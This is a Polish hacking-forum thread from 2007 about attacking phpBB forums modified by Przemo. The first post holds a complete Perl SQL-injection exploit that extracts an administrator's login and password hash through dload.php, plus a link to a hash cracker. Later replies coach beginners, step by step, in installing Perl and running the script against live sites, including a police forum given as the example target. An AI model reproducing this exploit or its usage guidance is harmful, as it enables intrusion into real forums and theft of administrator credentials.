exploit na phpbb przemo

Szuja · Lipiec 2, 2007

Exploit dość stary ale jeszcze jest wiele boardów podatnych na bug. (jeszcze do wczoraj lokomotywa.fm)
Gdy już mamy hash hasła to hasło możemy znaleźć dzięki programowi mass'a (http://mass.uk.to/data/md516.rar).

Kod:

#!/usr/bin/perl

#Exploit for phpbb modified by przemo

#Coded by:krasza[[email protected]]

#www:[url]http://www.krasza.int.pl[/url]

use strict;

use warnings;

use LWP::UserAgent;

if(!$ARGV[0]){

    print<<EOF;

perl explo.pl [url] [id_plik]

[url]-adres do servera wraz z katalogiem do forum;]

[id_user]-ID usera, którego ma zostac dodany login i hash

Przykład:

perl explo.pl [url]http://www.policja.gov.pl/forum[/url] krasza 2

EOF

    exit;

}

my $url=shift;

my $id;

if(!$ARGV[1]){

    $id=1;

}else{

    $id=shift;

}

my ($nowa_tresc,$dload,$zadanie);

$dload=$url."/dload.php";

my $ua = new LWP::UserAgent;

   $ua->agent("Firefox 1.5" . $ua->agent);

print "[+]Łączę się z ",$url,"...n";



      $zadanie = new HTTP::Request POST => $dload;

      $zadanie->content_type('application/x-www-form-urlencoded');

      $zadanie->content('subject=Bardzo+dobry+program%27%2C1158418260%2C%273712b478d0%27%2C2%29%2C%281%2C%28SELECT+CONCAT%28username%2C%27%3A%27%2Cuser_password%29+FROM+%60phpbb_users%60+WHERE+user_id%3D'.$id.'%29%2C%27Rewelacyjny+progs%27%2C1158418260%2C%273712b478d0%27%2C2%29%2F*&addbbcode18=&addbbcode20=12&helpbox=Rada%3A+Style+mog%B1+by%E6+stosowane+szybko+do+zaznaczonego+tekstu&message=Bardzo+dobry+program%2C+chociaz+po+jego+zainstalowaniu+nie+dziala+mi+prawidlowo+przegladarka+i+do+kaz
dego+wpisu+dodaja+mi+sie+jakies+cyfry+i+litery%3A%2F&action=file&id='.$id.'&comment=post&submit=Wy%B6lij');

my $wynik2 = $ua->request($zadanie);

if ($wynik2->is_success){

     print "[+]Login i hasło admina zostalo dodane;]n";

     print "[+]Haslo:".$dload."?action=file&id=1n";

}else{

     print "[-]Proba nie udanan";

}

PHmaster · Lipiec 2, 2007

stary exploit, jeszcze chyba z pół roku temu działał...przypomni ktoś, dla jakiej wersji to było

???

Szuja · Lipiec 2, 2007

phpBB modified v 1.12.5 by Przemo do wersji ściągniętych przed 19.12.2006 z downloadu ze strony przema (przemo.org)

evolucja · Lipiec 4, 2007

W czym to się kompiluje? :] Czy to jest w perlu?

I co dokładnie z tym? No nie kpw.?

Kod:

[url]-adres do servera wraz z katalogiem do forum;]

[id_user]-ID usera, którego ma zostac dodany login i hash

Przykład:

perl explo.pl [url]http://www.policja.gov.pl/forum[/url] krasza 2

EOF

Szuja · Lipiec 4, 2007

Kod:
Originally posted by evolucja
W czym to się kompiluje? :] Czy to jest w perlu?

I co dokładnie z tym? No nie kpw.?

Kod:

[url]-adres do servera wraz z katalogiem do forum;] [id_user]-ID usera, którego ma zostac dodany login i hash Przykład: perl explo.pl [url]http://www.policja.gov.pl/forum[/url] krasza 2 EOF

1. ściągnij to: http://www.activestate.com/Products/ActivePerl/
2. później start -> uruchom -> cmd -> wchodzisz przy pomocy cd do folderu z tym skryptem zapisanym jako explo.pl
3. wpisujesz perl explo.pl http://nazwastrony.pl/forum numeruseraadmina 2
zamiast numeruuseraadmina wpisujesz cyfre
4. gotowe ^^

GreatDragon · Lipiec 6, 2007

to coś działac mi nie chce robie tak pisze ze

i nie mam admina na userze HashMan :/ nie czaje tego pomocy.

Szuja · Lipiec 8, 2007

Originally posted by GreatDragon
to coś działac mi nie chce robie tak pisze ze
Obrazek

i nie mam admina na userze HashMan :/ nie czaje tego pomocy.

czytaj wszystkie posty wyżej

1. Działa na boardach zainstalowanych pół roku temu!
2. To nie daje twojemu kontu praw admina a podaje hash hasła istniejacego admina.
3. Zamiast HashMan wpisz numer "id" konta admina(istniejącego!) w http://adresboarda.pl/dload.php?action=file&id=1 pokaże się hash hasła admina.

4. Ten Board nie jest podatny na ten bug.

solsk · Lipiec 13, 2007

Heh, nawet gdy mamy takiego hasha md5 to raczej nic nam nie uda się zrobić

Chyba że potraficie : http://bbhelp.pl/dload.php?action=file&id=1

Szuja · Lipiec 13, 2007

ta metoda jest tylko dobra wtedy kiedy administracja używa popularnych haseł

FDJ · Lipiec 13, 2007

Jak dziecia tlumaczycie.
Ruszyc dupy poszukac na google to znajdziecie i w php i w perlu nowsza wersje podajaca od razu link.

iroki1 · Lipiec 22, 2007

A ja mam taki problem:
ściągnąłem to wszystko (ten kod), walnołem do notatnika i zapisałem jako explo.pl
wcześniej ściągnąłem perla (i przy tym explo.pl jest taka fajna ikonka :mruga: )
potem wchodze do cmd, i po pewnym czasie jestem w folderze gdzie ulokował się mój explo.pl
wpisuje

erl explo.pl http://www.ra.shou.pl/forum 2 , naciskam (mój ulubiony klawisz) enter, i cmd pokazuje coś takiego:Can't open perl script "explo.pl": no such file or directory. - co robie nie tak??

i jeszcze jedno przed zapisaniem usunołem ten fragment:

Przykład:
perl explo.pl http://www.policja.gov.pl/forum krasza 2

rem · Lipiec 22, 2007

Nic nie zmieniaj w tym expilocie , wklej go do notatnika taki jaki jest ;]

Crackman · Lipiec 23, 2007

Heh rem co Ty mu mowisz? Jak to ma wkleic tak jak jest? razem z tym ? "perl explo.pl http://www.policja.gov.pl/forum krasza 2 " chyba oczywiste ze jest to jedynie przykład zastosowania podany w exploicie i wlasnie te wartości sie podmienia ;-)

abramakabra · Lipiec 23, 2007

Originally posted by Crackman
Heh rem co Ty mu mowisz? Jak to ma wkleic tak jak jest? razem z tym ? "perl explo.pl http://www.policja.gov.pl/forum krasza 2 " chyba oczywiste ze jest to jedynie przykład zastosowania podany w exploicie i wlasnie te wartości sie podmienia ;-)

Proponuje nauczyć się podstaw perla to może nie będziesz wprowadzał ludzi w błąd.
Z tego exploita nic nie trzeba usuwać, tak jak rem mówi wkleja sie cały do notatnika i zapisuje z rozszerzeniem pl.

rem · Lipiec 23, 2007

Originally posted by Crackman
Heh rem co Ty mu mowisz? Jak to ma wkleic tak jak jest? razem z tym ? "perl explo.pl http://www.policja.gov.pl/forum krasza 2 " chyba oczywiste ze jest to jedynie przykład zastosowania podany w exploicie i wlasnie te wartości sie podmienia ;-)

Kochane neo to żeś nam zaszpanował wiedza na temat perla i expilotów

Crackman · Lipiec 23, 2007

To twoim zdaniem gddzie trzeba dać wartości kierunkujące na jakie forum ma być atak?

EDIT:
LOL juz wiem;P ale gafa;P

iroki1 · Lipiec 23, 2007

dalej to samo: Can't open perl script "explo.pl": no such file or directory. - co jest

rem · Lipiec 23, 2007

Originally posted by iroki1
dalej to samo: Can't open perl script "explo.pl": no such file or directory. - co jest

Pisze że nie możesz odtworzyć pliku , bo chyba podajesz zły adres ;] weź jeszcze raz sobie wklej ten kodzik w notatnik

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
if(!$ARGV[1]){
print<<EOF;
perl explo.pl [id_plik]
-adres do servera wraz z katalogiem...l[/b] i wklej do cdm i powinno byc dobrze ;]

iroki1 · Lipiec 23, 2007

Ok teraz działa, ale jeszcze jedno pytanie: wyświetla się coś takiego: login i hasło admina zostało dodane - ale gdzie??

rem · Lipiec 23, 2007

Zrób scenera cdm ;] ale chyba w hash

exploit na phpbb przemo

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Były Moderator

Użytkownik

Użytkownik

Użytkownik

Były Moderator

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik

Użytkownik